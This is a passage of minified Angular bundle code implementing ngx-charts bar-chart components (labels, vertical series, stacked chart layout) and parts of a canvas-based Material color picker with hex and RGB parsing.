Tt,this.horizontalPadding=2,this.verticalPadding=5,this.element=e.nativeElement}ngOnChanges(e){this.update()}getSize(){return{height:this.element.getBoundingClientRect().height,width:this.element.getBoundingClientRect().width,negative:this.value<0}}ngAfterViewInit(){this.dimensionsChanged.emit(this.getSize())}update(){this.formatedValue=this.valueFormatting?this.valueFormatting(this.value):Ub(this.value),"horizontal"===this.orientation?(this.x=this.barX+this.barWidth,this.value<0?(this.x=this.x-this.horizontalPadding,this.textAnchor="end"):(this.x=this.x+this.horizontalPadding,this.textAnchor="start"),this.y=this.barY+this.barHeight/2):(this.x=this.barX+this.barWidth/2,this.y=this.barY+this.barHeight,this.value<0?(this.y=this.y+this.verticalPadding,this.textAnchor="end"):(this.y=this.y-this.verticalPadding,this.textAnchor="start"),this.transform=`rotate(-45, ${this.x} , ${this.y})`)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi))},t.\u0275cmp=Wt({type:t,selectors:[["g","ngx-charts-bar-label",""]],inputs:{value:"value",valueFormatting:"valueFormatting",barX:"barX",barY:"barY",barWidth:"barWidth",barHeight:"barHeight",orientation:"orientation"},outputs:{dimensionsChanged:"dimensionsChanged"},features:[sa],attrs:CDe,decls:2,vars:5,consts:[["alignment-baseline","middle",1,"textDataLabel"]],template:function(e,i){1&e&&(fi(),m(0,"text",0),s(1),u()),2&e&&(Rt("text-anchor",i.textAnchor)("transform",i.transform)("x",i.x)("y",i.y),C(1),ct(" ",i.formatedValue," "))},styles:[".textDataLabel[_ngcontent-%COMP%]{font-size:11px}"],changeDetection:0}),t})(),R6e=(()=>{class t{constructor(e){this.platformId=e,this.type=Pm.Standard,this.tooltipDisabled=!1,this.animations=!0,this.showDataLabel=!1,this.noBarWhenZero=!0,this.select=new Tt,this.activate=new Tt,this.deactivate=new Tt,this.dataLabelHeightChanged=new Tt,this.barsForDataLabels=[],this.barOrientation=as,this.isSSR=!1}ngOnInit(){Zv(this.platformId)&&(this.isSSR=!0)}ngOnChanges(e){this.update()}update(){let e;this.updateTooltipSettings(),this.series.length&&(e=this.xScale.bandwidth()),e=Math.round(e);const i=Math.max(this.yScale.domain()[0],0),n={[Rp.positive]:0,[Rp.negative]:0};let c,r=Rp.positive;this.type===Pm.Normalized&&(c=this.series.map(d=>d.value).reduce((d,T)=>d+T,0)),this.bars=this.series.map((d,T)=>{let k=d.value;const q=this.getLabel(d),Y=Ub(q);r=k>0?Rp.positive:Rp.negative;const pe={value:k,label:q,roundEdges:this.roundEdges,data:d,width:e,formattedLabel:Y,height:0,x:0,y:0};if(this.type===Pm.Standard)pe.height=Math.abs(this.yScale(k)-this.yScale(i)),pe.x=this.xScale(q),pe.y=this.yScale(k<0?0:k);else if(this.type===Pm.Stacked){const Fe=n[r],Ne=Fe+k;n[r]+=k,pe.height=this.yScale(Fe)-this.yScale(Ne),pe.x=0,pe.y=this.yScale(Ne),pe.offset0=Fe,pe.offset1=Ne}else if(this.type===Pm.Normalized){let Fe=n[r],Ne=Fe+k;n[r]+=k,c>0?(Fe=100*Fe/c,Ne=100*Ne/c):(Fe=0,Ne=0),pe.height=this.yScale(Fe)-this.yScale(Ne),pe.x=0,pe.y=this.yScale(Ne),pe.offset0=Fe,pe.offset1=Ne,k=(Ne-Fe).toFixed(2)+"%"}this.colors.scaleType===Wa.Ordinal?pe.color=this.colors.getColor(q):this.type===Pm.Standard?(pe.color=this.colors.getColor(k),pe.gradientStops=this.colors.getLinearGradientStops(k)):(pe.color=this.colors.getColor(pe.offset1),pe.gradientStops=this.colors.getLinearGradientStops(pe.offset1,pe.offset0));let Re=Y;return pe.ariaLabel=Y+" "+k.toLocaleString(),null!=this.seriesName&&(Re=`${this.seriesName} \u2022 ${Y}`,pe.data.series=this.seriesName,pe.ariaLabel=this.seriesName+" "+pe.ariaLabel),pe.tooltipText=this.tooltipDisabled?void 0:`\n        <span class="tooltip-label">${function jI(t){return t.toLocaleString().replace(/[&'`"<>]/g,a=>({"&":"&amp;","'":"&#x27;","`":"&#x60;",'"':"&quot;","<":"&lt;",">":"&gt;"}[a]))}(Re)}</span>\n        <span class="tooltip-val">${this.dataLabelFormatting?this.dataLabelFormatting(k):k.toLocaleString()}</span>\n      `,pe}),this.updateDataLabels()}updateDataLabels(){if(this.type===Pm.Stacked){this.barsForDataLabels=[];const e={};e.series=this.seriesName;const i=this.series.map(r=>r.value).reduce((r,c)=>c>0?r+c:r,0),n=this.series.map(r=>r.value).reduce((r,c)=>c<0?r+c:r,0);e.total=i+n,e.x=0,e.y=0,e.height=this.yScale(e.total>0?i:n),e.width=this.xScale.bandwidth(),this.barsForDataLabels.push(e)}else this.barsForDataLabels=this.series.map(e=>{var i;const n={};return n.series=null!==(i=this.seriesName)&&void 0!==i?i:e.label,n.total=e.value,n.x=this.xScale(e.label),n.y=this.yScale(0),n.height=this.yScale(n.total)-this.yScale(0),n.width=this.xScale.bandwidth(),n})}updateTooltipSettings(){this.tooltipPlacement=this.tooltipDisabled?void 0:kn.Top,this.tooltipType=this.tooltipDisabled?void 0:Og.tooltip}isActive(e){return!!this.activeEntries&&void 0!==this.activeEntries.find(n=>e.name===n.name&&e.value===n.value)}onClick(e){this.select.emit(e)}getLabel(e){return e.label?e.label:e.name}trackBy(e,i){return i.label}trackDataLabelBy(e,i){return e+"#"+i.series+"#"+i.total}}return t.\u0275fac=function(e){return new(e||t)(Ee(lm))},t.\u0275cmp=Wt({type:t,selectors:[["g","ngx-charts-series-vertical",""]],inputs:{dims:"dims",type:"type",series:"series",xScale:"xScale",yScale:"yScale",colors:"colors",gradient:"gradient",activeEntries:"activeEntries",seriesName:"seriesName",tooltipDisabled:"tooltipDisabled",tooltipTemplate:"tooltipTemplate",roundEdges:"roundEdges",animations:"animations",showDataLabel:"showDataLabel",dataLabelFormatting:"dataLabelFormatting",noBarWhenZero:"noBarWhenZero"},outputs:{select:"select",activate:"activate",deactivate:"deactivate",dataLabelHeightChanged:"dataLabelHeightChanged"},features:[sa],attrs:DDe,decls:3,vars:3,consts:[[4,"ngIf"],["ngx-charts-bar","","ngx-tooltip","",3,"width","height","x","y","fill","stops","data","orientation","roundEdges","gradient","ariaLabel","isActive","tooltipDisabled","tooltipPlacement","tooltipType","tooltipTitle","tooltipTemplate","tooltipContext","noBarWhenZero","animations","select","activate","deactivate",4,"ngFor","ngForOf","ngForTrackBy"],["ngx-charts-bar","","ngx-tooltip","",3,"width","height","x","y","fill","stops","data","orientation","roundEdges","gradient","ariaLabel","isActive","tooltipDisabled","tooltipPlacement","tooltipType","tooltipTitle","tooltipTemplate","tooltipContext","noBarWhenZero","animations","select","activate","deactivate"],["ngx-charts-bar-label","",3,"barX","barY","barWidth","barHeight","value","valueFormatting","orientation","dimensionsChanged",4,"ngFor","ngForOf","ngForTrackBy"],["ngx-charts-bar-label","",3,"barX","barY","barWidth","barHeight","value","valueFormatting","orientation","dimensionsChanged"]],template:function(e,i){1&e&&(ne(0,wDe,2,2,"g",0),ne(1,RDe,2,2,"g",0),ne(2,kDe,2,2,"g",0)),2&e&&(V("ngIf",!i.isSSR),C(1),V("ngIf",i.isSSR),C(1),V("ngIf",i.showDataLabel))},dependencies:[w6e,I6e,Ri,Zi,$I],encapsulation:2,data:{animation:[nr("animationState",[gn(":leave",[zi({opacity:1}),En(500,zi({opacity:0}))])])]},changeDetection:0}),t})(),S6e=(()=>{class t extends hq{constructor(){super(...arguments),this.legend=!1,this.legendTitle="Legend",this.legendPosition=Su.Right,this.tooltipDisabled=!1,this.showGridLines=!0,this.activeEntries=[],this.trimXAxisTicks=!0,this.trimYAxisTicks=!0,this.rotateXAxisTicks=!0,this.maxXAxisTickLength=16,this.maxYAxisTickLength=16,this.barPadding=8,this.roundDomains=!1,this.showDataLabel=!1,this.noBarWhenZero=!0,this.activate=new Tt,this.deactivate=new Tt,this.margin=[10,20,10,20],this.xAxisHeight=0,this.yAxisWidth=0,this.dataLabelMaxHeight={negative:0,positive:0},this.isSSR=!1,this.barChartType=Pm,this.trackBy=(e,i)=>i.name}ngOnInit(){Zv(this.platformId)&&(this.isSSR=!0)}update(){super.update(),this.showDataLabel||(this.dataLabelMaxHeight={negative:0,positive:0}),this.margin=[10+this.dataLabelMaxHeight.positive,20,10+this.dataLabelMaxHeight.negative,20],this.dims=function T6e({width:t,height:a,margins:e,showXAxis:i=!1,showYAxis:n=!1,xAxisHeight:r=0,yAxisWidth:c=0,showXLabel:d=!1,showYLabel:T=!1,showLegend:k=!1,legendType:q=Wa.Ordinal,legendPosition:Y=Su.Right,columns:te=12}){let pe=e[3],Re=t,Fe=a-e[0]-e[2];return k&&Y===Su.Right&&(te-=q===Wa.Ordinal?2:1),Re=Re*te/12,Re=Re-e[1]-e[3],i&&(Fe-=5,Fe-=r,d&&(Fe-=30)),n&&(Re-=5,Re-=c,pe+=c,pe+=10,T&&(Re-=30,pe+=30)),Re=Math.max(0,Re),Fe=Math.max(0,Fe),{width:Math.floor(Re),height:Math.floor(Fe),xOffset:Math.floor(pe)}}({width:this.width,height:this.height,margins:this.margin,showXAxis:this.xAxis,showYAxis:this.yAxis,xAxisHeight:this.xAxisHeight,yAxisWidth:this.yAxisWidth,showXLabel:this.showXAxisLabel,showYLabel:this.showYAxisLabel,showLegend:this.legend,legendType:this.schemeType,legendPosition:this.legendPosition}),this.showDataLabel&&(this.dims.height-=this.dataLabelMaxHeight.negative),this.formatDates(),this.groupDomain=this.getGroupDomain(),this.innerDomain=this.getInnerDomain(),this.valueDomain=this.getValueDomain(),this.xScale=this.getXScale(),this.yScale=this.getYScale(),this.setColors(),this.legendOptions=this.getLegendOptions(),this.transform=`translate(${this.dims.xOffset} , ${this.margin[0]+this.dataLabelMaxHeight.negative})`}getGroupDomain(){const e=[];for(const i of this.results)e.includes(i.label)||e.push(i.label);return e}getInnerDomain(){const e=[];for(const i of this.results)for(const n of i.series)e.includes(n.label)||e.push(n.label);return e}getValueDomain(){const e=[];let i=0,n=0;for(const d of this.results){let T=0,k=0;for(const q of d.series)q.value<0?T+=q.value:k+=q.value,i=q.value<i?q.value:i,n=q.value>n?q.value:n;e.push(T),e.push(k)}return e.push(i),e.push(n),[Math.min(0,...e),this.yScaleMax?Math.max(this.yScaleMax,...e):Math.max(...e)]}getXScale(){const e=this.groupDomain.length/(this.dims.width/this.barPadding+1);return sT().rangeRound([0,this.dims.width]).paddingInner(e).domain(this.groupDomain)}getYScale(){const e=l2().range([this.dims.height,0]).domain(this.valueDomain);return this.roundDomains?e.nice():e}onDataLabelMaxHeightChanged(e,i){e.size.negative?this.dataLabelMaxHeight.negative=Math.max(this.dataLabelMaxHeight.negative,e.size.height):this.dataLabelMaxHeight.positive=Math.max(this.dataLabelMaxHeight.positive,e.size.height),i===this.results.length-1&&setTimeout(()=>this.update())}groupTransform(e){return`translate(${this.xScale(e.name)||0}, 0)`}onClick(e,i){i&&(e.series=i.name),this.select.emit(e)}setColors(){let e;e=this.schemeType===Wa.Ordinal?this.innerDomain:this.valueDomain,this.colors=new E6e(this.scheme,this.schemeType,e,this.customColors)}getLegendOptions(){const e={scaleType:this.schemeType,colors:void 0,domain:[],title:void 0,position:this.legendPosition};return e.scaleType===Wa.Ordinal?(e.domain=this.innerDomain,e.colors=this.colors,e.title=this.legendTitle):(e.domain=this.valueDomain,e.colors=this.colors.scale),e}updateYAxisWidth({width:e}){this.yAxisWidth=e,this.update()}updateXAxisHeight({height:e}){this.xAxisHeight=e,this.update()}onActivate(e,i,n=!1){const r=Object.assign({},e);i&&(r.series=i.name);const c=this.results.map(d=>d.series).flat().filter(d=>n?d.label===r.name:d.name===r.name&&d.series===r.series);this.activeEntries=[...c],this.activate.emit({value:r,entries:this.activeEntries})}onDeactivate(e,i,n=!1){const r=Object.assign({},e);i&&(r.series=i.name),this.activeEntries=this.activeEntries.filter(c=>n?c.label!==r.name:!(c.name===r.name&&c.series===r.series)),this.deactivate.emit({value:r,entries:this.activeEntries})}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275cmp=Wt({type:t,selectors:[["ngx-charts-bar-vertical-stacked"]],contentQueries:function(e,i,n){if(1&e&&fa(n,cDe,5),2&e){let r;Vt(r=Bt())&&(i.tooltipTemplate=r.first)}},inputs:{legend:"legend",legendTitle:"legendTitle",legendPosition:"legendPosition",xAxis:"xAxis",yAxis:"yAxis",showXAxisLabel:"showXAxisLabel",showYAxisLabel:"showYAxisLabel",xAxisLabel:"xAxisLabel",yAxisLabel:"yAxisLabel",tooltipDisabled:"tooltipDisabled",gradient:"gradient",showGridLines:"showGridLines",activeEntries:"activeEntries",schemeType:"schemeType",trimXAxisTicks:"trimXAxisTicks",trimYAxisTicks:"trimYAxisTicks",rotateXAxisTicks:"rotateXAxisTicks",maxXAxisTickLength:"maxXAxisTickLength",maxYAxisTickLength:"maxYAxisTickLength",xAxisTickFormatting:"xAxisTickFormatting",yAxisTickFormatting:"yAxisTickFormatting",xAxisTicks:"xAxisTicks",yAxisTicks:"yAxisTicks",barPadding:"barPadding",roundDomains:"roundDomains",yScaleMax:"yScaleMax",showDataLabel:"showDataLabel",dataLabelFormatting:"dataLabelFormatting",noBarWhenZero:"noBarWhenZero"},outputs:{activate:"activate",deactivate:"deactivate"},features:[ci],decls:6,vars:13,consts:[[3,"view","showLegend","legendOptions","activeEntries","animations","legendLabelActivate","legendLabelDeactivate","legendLabelClick"],[1,"bar-chart","chart"],["ngx-charts-x-axis","",3,"xScale","dims","showLabel","labelText","trimTicks","rotateTicks","maxTickLength","tickFormatting","ticks","xAxisOffset","dimensionsChanged",4,"ngIf"],["ngx-charts-y-axis","",3,"yScale","dims","showGridLines","showLabel","labelText","trimTicks","maxTickLength","tickFormatting","ticks","dimensionsChanged",4,"ngIf"],[4,"ngIf"],["ngx-charts-x-axis","",3,"xScale","dims","showLabel","labelText","trimTicks","rotateTicks","maxTickLength","tickFormatting","ticks","xAxisOffset","dimensionsChanged"],["ngx-charts-y-axis","",3,"yScale","dims","showGridLines","showLabel","labelText","trimTicks","maxTickLength","tickFormatting","ticks","dimensionsChanged"],[4,"ngFor","ngForOf","ngForTrackBy"],["ngx-charts-series-vertical","",3,"type","xScale","yScale","activeEntries","colors","series","dims","gradient","tooltipDisabled","tooltipTemplate","showDataLabel","dataLabelFormatting","seriesName","animations","noBarWhenZero","select","activate","deactivate","dataLabelHeightChanged"]],template:function(e,i){1&e&&(m(0,"ngx-charts-chart",0),he("legendLabelActivate",function(r){return i.onActivate(r,void 0,!0)})("legendLabelDeactivate",function(r){return i.onDeactivate(r,void 0,!0)})("legendLabelClick",function(r){return i.onClick(r)}),fi(),m(1,"g",1),ne(2,zDe,1,10,"g",2),ne(3,WDe,1,9,"g",3),ne(4,VDe,2,2,"g",4),u(),ne(5,HDe,2,2,"g",4),u()),2&e&&(V("view",Ah(10,Hb,i.width,i.height))("showLegend",i.legend)("legendOptions",i.legendOptions)("activeEntries",i.activeEntries)("animations",i.animations),C(1),Rt("transform",i.transform),C(1),V("ngIf",i.xAxis),C(1),V("ngIf",i.yAxis),C(1),V("ngIf",!i.isSSR),C(1),V("ngIf",i.isSSR))},dependencies:[mq,_6e,g6e,R6e,Ri,Zi],styles:[".ngx-charts-outer{-webkit-animation:chartFadeIn linear .6s;animation:chartFadeIn linear .6s}@-webkit-keyframes chartFadeIn{0%{opacity:0}20%{opacity:0}to{opacity:1}}@keyframes chartFadeIn{0%{opacity:0}20%{opacity:0}to{opacity:1}}.ngx-charts{float:left;overflow:visible}.ngx-charts .circle,.ngx-charts .cell,.ngx-charts .bar,.ngx-charts .arc{cursor:pointer}.ngx-charts .bar.active,.ngx-charts .bar:hover,.ngx-charts .cell.active,.ngx-charts .cell:hover,.ngx-charts .arc.active,.ngx-charts .arc:hover,.ngx-charts .card.active,.ngx-charts .card:hover{opacity:.8;transition:opacity .1s ease-in-out}.ngx-charts .bar:focus,.ngx-charts .cell:focus,.ngx-charts .arc:focus,.ngx-charts .card:focus{outline:none}.ngx-charts .bar.hidden,.ngx-charts .cell.hidden,.ngx-charts .arc.hidden,.ngx-charts .card.hidden{display:none}.ngx-charts g:focus{outline:none}.ngx-charts .line-series.inactive,.ngx-charts .line-series-range.inactive,.ngx-charts .polar-series-path.inactive,.ngx-charts .polar-series-area.inactive,.ngx-charts .area-series.inactive{transition:opacity .1s ease-in-out;opacity:.2}.ngx-charts .line-highlight{display:none}.ngx-charts .line-highlight.active{display:block}.ngx-charts .area{opacity:.6}.ngx-charts .circle:hover{cursor:pointer}.ngx-charts .label{font-size:12px;font-weight:400}.ngx-charts .tooltip-anchor{fill:#000}.ngx-charts .gridline-path{stroke:#ddd;stroke-width:1;fill:none}.ngx-charts .refline-path{stroke:#a8b2c7;stroke-width:1;stroke-dasharray:5;stroke-dashoffset:5}.ngx-charts .refline-label{font-size:9px}.ngx-charts .reference-area{fill-opacity:.05;fill:#000}.ngx-charts .gridline-path-dotted{stroke:#ddd;stroke-width:1;fill:none;stroke-dasharray:1,20;stroke-dashoffset:3}.ngx-charts .grid-panel rect{fill:none}.ngx-charts .grid-panel.odd rect{fill:#0000000d}\n"],encapsulation:2,data:{animation:[nr("animationState",[gn(":leave",[zi({opacity:1,transform:"*"}),En(500,zi({opacity:0,transform:"scale(0)"}))])])]},changeDetection:0}),t})(),xq=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Vd]]}),t})(),k6e=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Vd]]}),t})(),P6e=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Vd]]}),t})(),O6e=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Vd]]}),t})(),wq=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Vd]]}),t})();Math;let YI=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Vd]]}),t})(),z6e=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Vd,YI,wq]]}),t})(),F6e=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Vd]]}),t})(),V6e=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Vd]]}),t})(),B6e=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Vd,YI,xq]]}),t})(),Iq=(()=>{class t{constructor(){!function H6e(){"undefined"!=typeof SVGElement&&void 0===SVGElement.prototype.contains&&(SVGElement.prototype.contains=HTMLDivElement.prototype.contains)}()}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[Vd,x6e,xq,k6e,P6e,O6e,wq,z6e,F6e,YI,V6e,B6e]}),t})();const Rq=function(t){return{active:t}};function U6e(t,a){if(1&t){const e=Ye();m(0,"button",2),he("click",function(){const r=be(e).$implicit;return Me(B().select(r))}),u()}if(2&t){const e=a.$implicit,i=B();ri("background-color",e),V("ngClass",fr(3,Rq,i.selectedColor===e))}}function q6e(t,a){if(1&t){const e=Ye();m(0,"button",2),he("click",function(){const r=be(e).$implicit;return Me(B().select(r))}),u()}if(2&t){const e=a.$implicit,i=B();ri("background-color",e),V("ngClass",fr(3,Rq,i.selectedColor===e))}}const G6e=/^\s+/,j6e=/\s+$/,u2=Math.round,Q6e=(Math,Math,Math,/[^0-9]/g),Sq=["#ffffff","#ffff00","#ff00ff","#ff0000","#c0c0c0","#808080","#808000","#800080","#800000","#00ffff","#00ff00","#008080","#008000","#0000ff","#000080","#000000"];function kq(t,a,e){const i=t.getImageData(a,e,1,1).data;return{r:i[0],g:i[1],b:i[2]}}function Ng(t){return 1==t.length?"0"+t:""+t}function K6e(t){return Math.round(255*parseFloat(t)).toString(16)}function Pq(t){return Xl(t)/255}function Xl(t){return parseInt(t,16)}function Oq(t,a,e,i){var n=[Ng(u2(t).toString(16)),Ng(u2(a).toString(16)),Ng(u2(e).toString(16))];return i&&n[0].charAt(0)==n[0].charAt(1)&&n[1].charAt(0)==n[1].charAt(1)&&n[2].charAt(0)==n[2].charAt(1)?n[0].charAt(0)+n[1].charAt(0)+n[2].charAt(0):n.join("")}const Sp="(?:[-\\+]?\\d*\\.\\d+%?)|(?:[-\\+]?\\d+%?)",JI="[\\s|\\(]+("+Sp+")[,|\\s]+("+Sp+")[,|\\s]+("+Sp+")\\s*\\)?",ZI="[\\s|\\(]+("+Sp+")[,|\\s]+("+Sp+")[,|\\s]+("+Sp+")[,|\\s]+("+Sp+")\\s*\\)?",Lg={CSS_UNIT:new RegExp(Sp),rgb:new RegExp("rgb"+JI),rgba:new RegExp("rgba"+ZI),hsl:new RegExp("hsl"+JI),hsla:new RegExp("hsla"+ZI),hsv:new RegExp("hsv"+JI),hsva:new RegExp("hsva"+ZI),hex3:/^#?([0-9a-fA-F]{1})([0-9a-fA-F]{1})([0-9a-fA-F]{1})$/,hex6:/^#?([0-9a-fA-F]{2})([0-9a-fA-F]{2})([0-9a-fA-F]{2})$/,hex4:/^#?([0-9a-fA-F]{1})([0-9a-fA-F]{1})([0-9a-fA-F]{1})([0-9a-fA-F]{1})$/,hex8:/^#?([0-9a-fA-F]{2})([0-9a-fA-F]{2})([0-9a-fA-F]{2})([0-9a-fA-F]{2})$/};function e5(t){let a;return t=t.replace(G6e,"").replace(j6e,"").toLowerCase(),(a=Lg.rgb.exec(t))?{r:a[1],g:a[2],b:a[3],a:1}:(a=Lg.rgba.exec(t))?{r:a[1],g:a[2],b:a[3],a:a[4]}:(a=Lg.hex8.exec(t))?{r:Xl(a[1]),g:Xl(a[2]),b:Xl(a[3]),a:Pq(a[4])}:(a=Lg.hex6.exec(t))?{r:Xl(a[1]),g:Xl(a[2]),b:Xl(a[3]),a:1}:(a=Lg.hex4.exec(t))?{r:Xl(a[1]+""+a[1]),g:Xl(a[2]+""+a[2]),b:Xl(a[3]+""+a[3]),a:Pq(a[4]+""+a[4])}:(a=Lg.hex3.exec(t))?{r:Xl(a[1]+""+a[1]),g:Xl(a[2]+""+a[2]),b:Xl(a[3]+""+a[3]),a:1}:null}class kp{constructor(a,e,i,n){this.r=a>255?255:a,this.g=e>255?255:e,this.b=i>255?255:i,this.a=null!=n?n>1?1:n:1,this.roundA=Math.round(this.a),this.hex=Oq(this.r,this.g,this.b),this.rgba=this.toRgba()}toHex(a){return Oq(this.r,this.g,this.b,a)}toRgba(){return`rgba(${this.r},${this.g},${this.b},${this.a})`}toHexString(a){return"#"+this.toHex(a)}toRgbString(){return 1===this.a?"rgb("+Math.round(this.r)+", "+Math.round(this.g)+", "+Math.round(this.b)+")":"rgba("+Math.round(this.r)+", "+Math.round(this.g)+", "+Math.round(this.b)+", "+this.roundA+")"}toHex8(a){return function $6e(t,a,e,i,n){var r=[Ng(u2(t).toString(16)),Ng(u2(a).toString(16)),Ng(u2(e).toString(16)),Ng(K6e(i))];return n&&r[0].charAt(0)==r[0].charAt(1)&&r[1].charAt(0)==r[1].charAt(1)&&r[2].charAt(0)==r[2].charAt(1)&&r[3].charAt(0)==r[3].charAt(1)?r[0].charAt(0)+r[1].charAt(0)+r[2].charAt(0)+r[3].charAt(0):r.join("")}(this.r,this.g,this.b,this.a,a)}toHex8String(a){return"#"+this.toHex8(a)}toString(a){let i;return a||!(this.a<1&&this.a>=0)||"hex"!==a&&"hex6"!==a&&"hex3"!==a&&"hex4"!==a&&"hex8"!==a?("rgb"===a&&(i=this.toRgbString()),("hex"===a||"hex6"===a)&&(i=this.toHexString()),"hex3"===a&&(i=this.toHexString(!0)),"hex4"===a&&(i=this.toHex8String(!0)),"hex8"===a&&(i=this.toHex8String()),i||this.toHexString()):this.toRgbString()}}let Nq=(()=>{class t{constructor(e,i){this.zone=e,this.colorChanged=new Tt,this.x=0,this.y=0,this.drag=!1,this._destroyed=new J,this.elementId=i}ngOnDestroy(){this._destroyed.next(),this._destroyed.complete()}ngAfterViewInit(){this.canvas=document.getElementById(this.elementId),this.ctx=this.canvas.getContext("2d"),this.width=this.canvas.width,this.height=this.canvas.height,this.draw()}draw(){this.ctx.clearRect(0,0,this.width,this.height),this.ctx.rect(0,0,this.width,this.height),this.fillGradient(),0!=this.y&&this.redrawIndicator(this.x,this.y)}onMousedown(e){this.drag=!0,this.changeColor(e),this.zone.runOutsideAngular(()=>{this.canvas.addEventListener("mousemove",this.onMousemove.bind(this))})}onMousemove(e){this.drag&&this.zone.run(()=>{this.changeColor(e)})}onMouseup(e){this.drag=!1,this.canvas.removeEventListener("mousemove",this.onMousemove)}emitChange(e){this.colorChanged.emit(e)}}return t.\u0275fac=function(e){_d()},t.\u0275dir=Ot({type:t,inputs:{color:"color"},outputs:{colorChanged:"colorChanged"}}),t})(),J6e=(()=>{class t extends Nq{constructor(e){super(e,"color-strip"),this.zone=e}ngOnInit(){}ngAfterViewInit(){super.ngAfterViewInit()}fillGradient(){const e=this.ctx.createLinearGradient(0,0,0,this.height);e.addColorStop(0,"rgba(255, 0, 0, 1)"),e.addColorStop(.17,"rgba(255, 255, 0, 1)"),e.addColorStop(.34,"rgba(0, 255, 0, 1)"),e.addColorStop(.51,"rgba(0, 255, 255, 1)"),e.addColorStop(.68,"rgba(0, 0, 255, 1)"),e.addColorStop(.85,"rgba(255, 0, 255, 1)"),e.addColorStop(1,"rgba(255, 0, 0, 1)"),this.ctx.fillStyle=e,this.ctx.fill()}redrawIndicator(e,i){this.ctx.beginPath(),this.ctx.strokeStyle="white",this.ctx.lineWidth=2,this.ctx.arc(7.5,i,7.5,0,2*Math.PI,!1),this.ctx.stroke(),this.ctx.closePath()}changeColor(e){this.x=e.offsetX,this.y=e.offsetY,this.draw();const{r:i,g:n,b:r}=kq(this.ctx,e.offsetX,e.offsetY);this.emitChange(new kp(i,n,r))}}return t.\u0275fac=function(e){return new(e||t)(Ee(qi))},t.\u0275cmp=Wt({type:t,selectors:[["ngx-mat-color-slider"]],features:[ci],decls:1,vars:0,consts:[["id","color-strip","width","15","height","200",1,"zone-strip",3,"mousedown","mouseup"]],template:function(e,i){1&e&&(m(0,"canvas",0),he("mousedown",function(r){return i.onMousedown(r)})("mouseup",function(r){return i.onMouseup(r)}),u())}}),t})(),Z6e=(()=>{class t{constructor(){}onInput(e){this._formatInput(e.target)}_formatInput(e){let i=Number(e.value.replace(Q6e,""));i=isNaN(i)?0:i,e.value=i}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["","ngxMatNumericColorInput",""]],hostBindings:function(e,i){1&e&&he("input",function(r){return i.onInput(r)})}}),t})(),txe=(()=>{class t extends Nq{constructor(e){super(e,"color-block"),this.zone=e,this._resetBaseColor=!0,this.formGroup=new R4({r:new lu(null,[Td.required]),g:new lu(null,[Td.required]),b:new lu(null,[Td.required]),a:new lu(null,[Td.required]),hex:new lu(null,[Td.required,Td.pattern(Lg.hex6)])})}get rCtrl(){return this.formGroup.get("r")}get gCtrl(){return this.formGroup.get("g")}get bCtrl(){return this.formGroup.get("b")}get aCtrl(){return this.formGroup.get("a")}get hexCtrl(){return this.formGroup.get("hex")}ngOnInit(){ra(this.rCtrl.valueChanges,this.gCtrl.valueChanges,this.bCtrl.valueChanges,this.aCtrl.valueChanges).pipe(ea(this._destroyed),lp(400)).subscribe(n=>{const r=new kp(Number(this.rCtrl.value),Number(this.gCtrl.value),Number(this.bCtrl.value),Number(this.aCtrl.value));this.emitChange(r)}),this.hexCtrl.valueChanges.pipe(ea(this._destroyed),lp(400),Bh()).subscribe(n=>{const r=e5(n);if(null!=r){const c=new kp(r.r,r.g,r.b,r.a);this.emitChange(c)}})}ngOnChanges(e){e.color&&e.color.currentValue&&(this.updateForm(e.color.currentValue),this._resetBaseColor&&(this._baseColor=e.color.currentValue),this._resetBaseColor=!0,e.color.firstChange||this.draw())}updateForm(e){const i={emitEvent:!1};this.rCtrl.setValue(e.r,i),this.gCtrl.setValue(e.g,i),this.bCtrl.setValue(e.b,i),this.aCtrl.setValue(e.a,i),this.hexCtrl.setValue(e.hex,i)}redrawIndicator(e,i){this.ctx.beginPath(),this.ctx.strokeStyle="white",this.ctx.arc(e,i,5,0,2*Math.PI,!1),this.ctx.stroke(),this.ctx.closePath()}fillGradient(){this.ctx.fillStyle=this._baseColor?this._baseColor.rgba:"rgba(255,255,255,1)",this.ctx.fillRect(0,0,this.width,this.height);const e=this.ctx.createLinearGradient(0,0,this.width,0);e.addColorStop(0,"rgba(255,255,255,1)"),e.addColorStop(1,"rgba(255,255,255,0)"),this.ctx.fillStyle=e,this.ctx.fillRect(0,0,this.width,this.height);const i=this.ctx.createLinearGradient(0,0,0,this.height);i.addColorStop(0,"rgba(0,0,0,0)"),i.addColorStop(1,"rgba(0,0,0,1)"),this.ctx.fillStyle=i,this.ctx.fillRect(0,0,this.width,this.height)}onSliderColorChanged(e){this._baseColor=e,this.color=e,this.fillGradient(),this.emitChange(e)}changeColor(e){this.x=e.offsetX,this.y=e.offsetY,this._resetBaseColor=!1,this.draw();const{r:i,g:n,b:r}=kq(this.ctx,e.offsetX,e.offsetY);this.emitChange(new kp(i,n,r))}}return t.\u0275fac=function(e){return 